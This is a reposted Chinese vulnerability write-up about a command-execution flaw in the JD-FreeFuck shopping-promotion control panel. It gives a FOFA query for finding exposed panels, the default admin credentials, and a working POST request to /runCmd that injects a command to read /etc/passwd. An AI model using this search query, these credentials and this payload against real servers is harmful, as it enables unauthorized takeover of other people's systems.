当前位置：网站首页>JD-FreeFuck 京東薅羊毛控制面板後臺命令執行漏洞

JD-FreeFuck 京東薅羊毛控制面板後臺命令執行漏洞

2022-04-23 18:05:00 【孤桜懶契】

漏洞描述

i JD-FreeFuck 存在後臺命令執行漏洞，由於傳參執行命令時沒有對內容過濾，導致可以執行任意命令，控制服務器項目地址： https://github.com/meselson/JD-FreeFuck

漏洞影響

s JD-FreeFuck

空間測繪

d FOFA：title="京東薅羊毛控制面板"

漏洞複現

訪問後登錄頁面如下

默認賬號useradmin/supermanito

POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

個人博客

孤桜懶契：https://gylq.gitee.io/time

版权声明
本文为[孤桜懶契]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/04/202204231804351608.html

边栏推荐

猜你喜欢

随机推荐